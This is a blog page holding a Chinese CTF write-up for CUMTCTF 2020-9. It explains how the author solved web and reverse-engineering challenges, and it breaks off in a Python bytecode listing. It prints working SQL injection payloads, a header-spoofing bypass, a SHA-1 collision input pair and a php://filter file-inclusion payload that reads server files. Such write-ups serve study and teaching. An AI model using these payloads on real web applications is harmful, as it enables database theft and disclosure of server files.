<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/bug-ddblog-punish/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/bug-ddblog-punish/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/bug-ddblog-punish/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/bug-ddblog-punish/images/logo.svg" color="#222">

<link rel="stylesheet" href="/bug-ddblog-punish/css/main.css">


<link rel="stylesheet" href="/bug-ddblog-punish/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/bug-ddblog-punish/lib/pace/pace-theme-center-atom.min.css">
  <script src="/bug-ddblog-punish/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"giant-whale.gitee.io","root":"/bug-ddblog-punish/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="CUMTCTF 2020年9月赛">
<meta property="og:type" content="article">
<meta property="og:title" content="CUMTCTF-2020-9">
<meta property="og:url" content="https://giant-whale.gitee.io/bug-ddblog-punish/p/59556/index.html">
<meta property="og:site_name" content="bugDD">
<meta property="og:description" content="CUMTCTF 2020年9月赛">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/10/12/Jrb7gyDzFqG6aMK.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/BQpYG6tqaFLw4nX.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/s83WSb1g4fdR9qr.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/DLOjWd4XQlgxFCc.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/uz4FyA6kivBZ9EW.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/25FNXWBzYZQhgJq.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/utRs7zG8FdINHVr.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/kniXgFWmOtSjh8z.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/IjzCB6t3DbLSas1.png">
<meta property="og:image" content="https://i.loli.net/2020/10/12/eiDBAdk6qT18Nva.png">
<meta property="article:published_time" content="2020-10-12T03:41:31.000Z">
<meta property="article:modified_time" content="2020-10-17T07:37:33.661Z">
<meta property="article:author" content="Zhou Hao">
<meta property="article:tag" content="CUMTCTF">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/10/12/Jrb7gyDzFqG6aMK.png">

<link rel="canonical" href="https://giant-whale.gitee.io/bug-ddblog-punish/p/59556/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CUMTCTF-2020-9 | bugDD</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/bug-ddblog-punish/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">bugDD</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">bugDD Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/bug-ddblog-punish/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/bug-ddblog-punish/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://giant-whale.gitee.io/bug-ddblog-punish/p/59556/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/bug-ddblog-punish/images/avatar.gif">
      <meta itemprop="name" content="Zhou Hao">
      <meta itemprop="description" content="bugDD的日常总结">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="bugDD">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CUMTCTF-2020-9
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-10-12 11:41:31" itemprop="dateCreated datePublished" datetime="2020-10-12T11:41:31+08:00">2020-10-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-10-17 15:37:33" itemprop="dateModified" datetime="2020-10-17T15:37:33+08:00">2020-10-17</time>
              </span>

          
            <div class="post-description">CUMTCTF 2020年9月赛</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Web签到"><a href="#Web签到" class="headerlink" title="Web签到"></a>Web签到</h3><p>按照题目发送参数1和2：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">curl</span> <span class="literal">-Uri</span> http://<span class="number">202.119</span>.<span class="number">201.197</span>:<span class="number">13001</span>/?<span class="number">1</span>=<span class="number">1</span> <span class="literal">-Method</span> POST <span class="literal">-Body</span> <span class="selector-tag">@</span>&#123;<span class="string">&quot;2&quot;</span>=<span class="string">&quot;2&quot;</span>&#125; | <span class="built_in">Select-Object</span> Content | <span class="built_in">Write-Host</span></span><br></pre></td></tr></table></figure>

<p>得到页面代码。</p>
<p>猜flag可能存在于flag、flag.txt、flag.php、flag.phps等文件中。</p>
<p>最终确认在flag.php文件中。</p>
<p>再次发送请求得到Flag。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">curl</span> <span class="literal">-Uri</span> <span class="string">&#x27;http://202.119.201.197:13001/?1=1&amp;file=flag.php&#x27;</span> <span class="literal">-Method</span> POST <span class="literal">-Body</span> <span class="selector-tag">@</span>&#123;<span class="string">&quot;2&quot;</span>=<span class="string">&quot;2&quot;</span>&#125; | <span class="built_in">Select-Object</span> Content | <span class="built_in">Write-Host</span></span><br></pre></td></tr></table></figure>

<h3 id="Babysqli"><a href="#Babysqli" class="headerlink" title="Babysqli"></a>Babysqli</h3><p>Burp中截包发送到Repeater中，令username随意，password为<strong>1 and 1=1</strong>发现提示<strong>hacker?**，于是检测该字符串中可能被拦截字符(串)，最终确定</strong>and<strong>和</strong>空格**被拦截。</p>
<p>在password中加入单引号，提示Mysql错误，说明语句被闭合了。</p>
<p>检测到联合查询未被拦截。</p>
<p><img src="https://i.loli.net/2020/10/12/Jrb7gyDzFqG6aMK.png" alt="1601016840943"></p>
<p>而后，不断增加字段数，直到可以匹配为止，这时字段数就已经得到了。</p>
<p><img src="https://i.loli.net/2020/10/12/BQpYG6tqaFLw4nX.png" alt="1601016929256"></p>
<p>并且可以看到输出了4，此时我们同样拿到了回显点。</p>
<p><img src="https://i.loli.net/2020/10/12/s83WSb1g4fdR9qr.png" alt="1601016992852"></p>
<p>最终构造</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;union<span class="comment">/**/</span><span class="keyword">select</span><span class="comment">/**/</span><span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="keyword">password</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span><span class="comment">/**/</span><span class="keyword">from</span><span class="comment">/**/</span><span class="keyword">users</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>成功拿到Flag.</p>
<h3 id="Secret？"><a href="#Secret？" class="headerlink" title="Secret？"></a>Secret？</h3><p>将图片下载，隐写获取其源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_re porting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">&#x27;flagphp&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($ _GET[<span class="string">&#x27;param1&#x27;</span>]))  &#123;</span><br><span class="line">	 $str1=$_GET[<span class="string">&#x27;param1&#x27;</span>];</span><br><span class="line">     <span class="keyword">if</span>(file_get_contents($str1)!== <span class="string">&#x27;Suvin_wants_a_girlfriend&#x27;</span>)</span><br><span class="line">        <span class="keyword">die</span>( <span class="string">&quot;Suvin doesn&#x27;t like you&quot;</span> );</span><br><span class="line">	 i f(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;param2&#x27;</span>]) ) &#123;</span><br><span class="line">		 $str2 =$_GET[<span class="string">&#x27;param2&#x27;</span>] ;</span><br><span class="line">		 <span class="keyword">if</span>(!is _numeric($str2))  <span class="keyword">die</span> (<span class="string">&#x27;Suvin prefers strings of Numbers&#x27;</span>);</span><br><span class="line">		 <span class="keyword">else</span> <span class="keyword">if</span>($str2&lt;<span class="number">3600</span>*<span class="number">24</span>*<span class="number">30</span>) <span class="keyword">die</span>( <span class="string">&#x27;Suvin s ays the num is t oo short &#x27;</span>);</span><br><span class="line">		 <span class="keyword">else</span> <span class="keyword">if</span>($str2&gt;<span class="number">3600</span>*<span class="number">24</span>*<span class="number">31</span>) <span class="keyword">die</span>(<span class="string">&#x27;Suvin say s the num is too long&#x27;</span>);</span><br><span class="line">		 <span class="keyword">else</span> &#123;</span><br><span class="line">			 <span class="keyword">echo</span> <span class="string">&quot;Suvin says he&#x27;s falling in love with you!&quot;</span><span class="string">&quot;&lt;/ br&gt;&quot;</span>;</span><br><span class="line">			 sleep(intval($str2));</span><br><span class="line">			</span><br><span class="line">		&#125;</span><br><span class="line">		 <span class="keyword">if</span> (i sset($_POST[<span class="string">&#x27;param1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>( $_POST[<span class="string">&#x27;param2&#x27;</span>] )) &#123;</span><br><span class="line">			 $str1=$_POST[<span class="string">&#x27;param1&#x27;</span>];</span><br><span class="line">			 $str2=$_POST[<span class="string">&#x27;param2&#x27;</span>];</span><br><span class="line">			 <span class="keyword">if</span>(strlen($str1 )&gt;<span class="number">1000</span>)  <span class="keyword">die</span>(<span class="string">&quot;It&#x27; s too long&quot;</span>);</span><br><span class="line">			 <span class="keyword">if</span>(((<span class="keyword">string</span>)$str1!==(<span class="keyword">string</span>)$str2)&amp;&amp;(sha1($str1)===sha1($str2) )) <span class="keyword">echo</span> $flag;</span><br><span class="line">			 <span class="keyword">else</span>  <span class="keyword">die</span>(<span class="string">&quot;It &#x27;s so similar to md5&quot;</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>代码使用了file_get_contents，考虑使用伪协议，于是构建<strong>param1=data://text/plain,Suvin_wants_a_girlfriend</strong>，成功绕过第一个die。</p>
<p>第二个要求必须传入数字，而后sleep(intval())，考虑到数必须在3600*24*30到3600*24*31中间，于是选择</p>
<p>2600000，而后得整形转换，则构造<strong>param2=0.26e7</strong>，成功绕过sleep和die。</p>
<p>最后的SHA1百度得碰撞案例：</p>
<p><strong>param1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1</strong></p>
<p><strong>param2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1</strong></p>
<p>最终得到flag</p>
<h3 id="Babysqli2"><a href="#Babysqli2" class="headerlink" title="Babysqli2"></a>Babysqli2</h3><p>同样Burp截包发送到Repeater中，方便修改。</p>
<p>发现单引号被拦截，而有两个参数，于是考虑在第一个参数使用转义将第一个参数后的闭合单引号去除，即：</p>
<p><img src="https://i.loli.net/2020/10/12/DLOjWd4XQlgxFCc.png" alt="1601017925079"></p>
<p>此处判断存在注入是构建：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=1%5C&amp;password=or<span class="comment">/**/</span>1=1<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>发现反馈Login Successful，则可判断为Bool型盲注。</p>
<p>由于题目已说语句一样，则必然存在password字段(并且我坚信FLAG就在这里面)。</p>
<p>前面说过单引号被拦截，同样被拦截的还有substr函数和mid函数，发现left和right未被拦截，于是令password：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">or<span class="comment">/**/</span>ord(right(left((<span class="keyword">select</span><span class="comment">/**/</span><span class="keyword">password</span><span class="comment">/**/</span><span class="keyword">from</span><span class="comment">/**/</span><span class="keyword">users</span><span class="comment">/**/</span><span class="keyword">limit</span><span class="comment">/**/</span><span class="number">9</span>,<span class="number">1</span>),<span class="number">1</span>),<span class="number">1</span>))=<span class="number">67</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>这里等于67是因为FLAG第一个字母肯定是C了，limit后面的参数是从0-100爆破模块得到的。</p>
<p>于是锁定flag应该在第十条记录中，将该请求再发送到Intruder中，进行爆破。</p>
<p>设置类型为Cluster Bomb，标记：</p>
<p><img src="https://i.loli.net/2020/10/12/uz4FyA6kivBZ9EW.png" alt="1601018431546"></p>
<p>两个字典均为0-127的数字，开始爆破。</p>
<p><img src="https://i.loli.net/2020/10/12/25FNXWBzYZQhgJq.png" alt="1601018579687"></p>
<p>结果导出后，payload1对应第几个字符，payload2对应该字符的ascii码，保留最后一个ASCII为125的字符，其余去掉，使用Python转换为字符后得到Flag。</p>
<h3 id="简单的文件包含"><a href="#简单的文件包含" class="headerlink" title="简单的文件包含"></a>简单的文件包含</h3><p>提示： Sorry, this site is only optimized for those who comes from localhost </p>
<p>改Client-IP=127.0.0.1，即可拿到源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> ($_SERVER[<span class="string">&#x27;HTTP_CLIENT_IP&#x27;</span>] != <span class="string">&#x27;127.0.0.1&#x27;</span> &amp;&amp; $_SERVER[<span class="string">&#x27;HTTP_X_REAL_IP&#x27;</span>] != <span class="string">&#x27;127.0.0.1&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> ($_SERVER[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>] == <span class="string">&quot;127.0.0.1&quot;</span>) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;Do u think that I dont know X-Forwarded-For?&lt;br&gt;Too young too simple sometimes naive&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Sorry, this site is only optimized for those who comes from localhost&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">&#x27;f&#x27;</span>])) </span><br><span class="line"><span class="keyword">include_once</span>($_POST[<span class="string">&#x27;f&#x27;</span>]); </span><br></pre></td></tr></table></figure>

<p>发现两个include_once，于是考虑重复包含。</p>
<p>经搜索，在安全客(连接： <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/213235#h3-5">https://www.anquanke.com/post/id/213235#h3-5</a> )发现此Payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;var&#x2F;www&#x2F;html&#x2F;flag.php</span><br></pre></td></tr></table></figure>

<p>最终拿到Flag的Base64形式：</p>
<p><img src="https://i.loli.net/2020/10/12/utRs7zG8FdINHVr.png" alt="1601019351026"></p>
<p>在Decoder模块中解码得到最终Flag。</p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="连个签到分都不给你"><a href="#连个签到分都不给你" class="headerlink" title="连个签到分都不给你"></a>连个签到分都不给你</h3><p>拖入IDA，找到Flag。</p>
<p><img src="https://i.loli.net/2020/10/12/kniXgFWmOtSjh8z.png" alt="1601019580261"></p>
<h3 id="Python题禁止Py"><a href="#Python题禁止Py" class="headerlink" title="Python题禁止Py"></a>Python题禁止Py</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">4</span>           <span class="number">0</span> LOAD_GLOBAL              <span class="number">0</span> (input)</span><br><span class="line">             <span class="number">2</span> CALL_FUNCTION            <span class="number">0</span>       </span><br><span class="line">             <span class="number">4</span> STORE_FAST               <span class="number">0</span> (flag)</span><br><span class="line"></span><br><span class="line"> <span class="number">5</span>           <span class="number">6</span> LOAD_CONST               <span class="number">1</span> (<span class="number">80</span>)  </span><br><span class="line">             <span class="number">8</span> LOAD_CONST               <span class="number">2</span> (<span class="number">70</span>)  </span><br><span class="line">            <span class="number">10</span> LOAD_CONST               <span class="number">3</span> (<span class="number">94</span>)  </span><br><span class="line">            <span class="number">12</span> LOAD_CONST               <span class="number">4</span> (<span class="number">71</span>)  </span><br><span class="line">            <span class="number">14</span> LOAD_CONST               <span class="number">1</span> (<span class="number">80</span>)  </span><br><span class="line">            <span class="number">16</span> LOAD_CONST               <span class="number">4</span> (<span class="number">71</span>)  </span><br><span class="line">            <span class="number">18</span> LOAD_CONST               <span class="number">5</span> (<span class="number">85</span>)  </span><br><span class="line">            <span class="number">20</span> LOAD_CONST               <span class="number">6</span> (<span class="number">104</span>) </span><br><span class="line">            <span class="number">22</span> LOAD_CONST               <span class="number">7</span> (<span class="number">86</span>)  </span><br><span class="line">            <span class="number">24</span> LOAD_CONST               <span class="number">8</span> (<span class="number">39</span>)  </span><br><span class="line">            <span class="number">26</span> LOAD_CONST               <span class="number">9</span> (<span class="number">64</span>)  </span><br><span class="line">            <span class="number">28</span> LOAD_CONST              <span class="number">10</span> (<span class="number">106</span>) </span><br><span class="line">            <span class="number">30</span> LOAD_CONST              <span class="number">11</span> (<span class="number">76</span>)  </span><br><span class="line">            <span class="number">32</span> LOAD_CONST              <span class="number">12</span> (<span class="number">67</span>)  </span><br><span class="line">            <span class="number">34</span> LOAD_CONST              <span class="number">10</span> (<span class="number">106</span>) </span><br><span class="line">            <span class="number">36</span> LOAD_CONST               <span class="number">4</span> (<span class="number">71</span>)  </span><br><span class="line">            <span class="number">38</span> LOAD_CONST              <span class="number">13</span> (<span class="number">123</span>) </span><br><span class="line">            <span class="number">40</span> LOAD_CONST              <span class="number">14</span> (<span class="number">92</span>)  </span><br><span class="line">            <span class="number">42</span> LOAD_CONST              <span class="number">15</span> (<span class="number">125</span>)</span><br><span class="line">            <span class="number">44</span> LOAD_CONST              <span class="number">11</span> (<span class="number">76</span>)</span><br><span class="line">            <span class="number">46</span> LOAD_CONST              <span class="number">16</span> (<span class="number">37</span>)</span><br><span class="line">            <span class="number">48</span> LOAD_CONST              <span class="number">10</span> (<span class="number">106</span>)</span><br><span class="line">            <span class="number">50</span> LOAD_CONST              <span class="number">17</span> (<span class="number">103</span>)</span><br><span class="line">            <span class="number">52</span> LOAD_CONST              <span class="number">18</span> (<span class="number">118</span>)</span><br><span class="line">            <span class="number">54</span> LOAD_CONST               <span class="number">1</span> (<span class="number">80</span>)</span><br><span class="line">            <span class="number">56</span> LOAD_CONST              <span class="number">19</span> (<span class="number">35</span>)</span><br><span class="line">            <span class="number">58</span> LOAD_CONST              <span class="number">20</span> (<span class="number">119</span>)</span><br><span class="line">            <span class="number">60</span> LOAD_CONST              <span class="number">21</span> (<span class="number">32</span>)</span><br><span class="line">            <span class="number">62</span> LOAD_CONST              <span class="number">22</span> (<span class="number">110</span>)</span><br><span class="line">            <span class="number">64</span> BUILD_LIST              <span class="number">29</span></span><br><span class="line">            <span class="number">66</span> STORE_FAST               <span class="number">1</span> (cipher)</span><br><span class="line"></span><br><span class="line"> <span class="number">7</span>          <span class="number">68</span> LOAD_GLOBAL              <span class="number">1</span> (len)</span><br><span class="line">            <span class="number">70</span> LOAD_FAST                <span class="number">0</span> (flag)</span><br><span class="line">            <span class="number">72</span> CALL_FUNCTION            <span class="number">1</span></span><br><span class="line">            <span class="number">74</span> LOAD_CONST              <span class="number">23</span> (<span class="number">29</span>)</span><br><span class="line">            <span class="number">76</span> COMPARE_OP               <span class="number">2</span> (==)</span><br><span class="line">            <span class="number">78</span> POP_JUMP_IF_FALSE      <span class="number">130</span></span><br><span class="line"></span><br><span class="line"> <span class="number">8</span>          <span class="number">80</span> SETUP_LOOP              <span class="number">44</span> (to <span class="number">126</span>)</span><br><span class="line">            <span class="number">82</span> LOAD_GLOBAL              <span class="number">2</span> (enumerate)</span><br><span class="line">            <span class="number">84</span> LOAD_FAST                <span class="number">0</span> (flag)</span><br><span class="line">            <span class="number">86</span> CALL_FUNCTION            <span class="number">1</span></span><br><span class="line">            <span class="number">88</span> GET_ITER</span><br><span class="line">       &gt;&gt;   <span class="number">90</span> FOR_ITER                <span class="number">32</span> (to <span class="number">124</span>)</span><br><span class="line">            <span class="number">92</span> UNPACK_SEQUENCE          <span class="number">2</span></span><br><span class="line">            <span class="number">94</span> STORE_FAST               <span 